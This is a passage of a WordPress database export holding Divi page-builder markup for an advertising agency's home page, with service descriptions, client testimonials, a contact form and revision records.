Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-4.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>[/et_pb_testimonial][et_pb_testimonial author=\"Mrityunjaya\" job_title=\"Marketing Head\" company_name=\"Renefurterer\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“They are superb in planning and graphic designing. I feel comfortable, narrating the ideas, as their interest level and curiosity excite me to do brilliant work..”[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Sandeep\" job_title=\"Marketing\" company_name=\"Yamaha Motor Company\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“It is always an exciting journey to work with team WTH and I am glad to share my experience that they are outstanding, in terms of understanding the brief and executing it as per our business need. Best Digital Agency”[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2021-04-02 06:38:14','2021-04-02 06:38:14','',134,'https://wthtest1.in8.cdn-alpha.com/?p=806',0,'revision','',0),(808,1,'2021-07-21 08:12:43','2021-07-21 08:12:43','','Logo-domainlelo','','inherit','open','closed','','logo-domainlelo','','','2021-07-21 08:12:43','2021-07-21 08:12:43','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2021/07/Logo-domainlelo.png',0,'attachment','image/png',0),(809,1,'2022-03-17 19:25:24','2022-03-17 19:25:24','','Artboard','','inherit','open','closed','','artboard-6','','','2022-03-17 19:25:24','2022-03-17 19:25:24','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2022/03/Artboard.png',0,'attachment','image/png',0),(811,1,'2022-12-08 06:51:44','2022-12-08 06:51:44','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-divi','','','2022-12-08 06:51:44','2022-12-08 06:51:44','',0,'https://wthtest1.in8.cdn-alpha.com/wp-global-styles-divi/',0,'wp_global_styles','',0),(812,1,'2022-12-08 06:54:05','2022-12-08 06:54:05','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.6\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2021/03/banner-1.jpeg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising Agency</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.6\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Packed with creative skills; we have been serving as one of the best agencies in the region.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"creative advertising agency in Delhi\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.6\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" 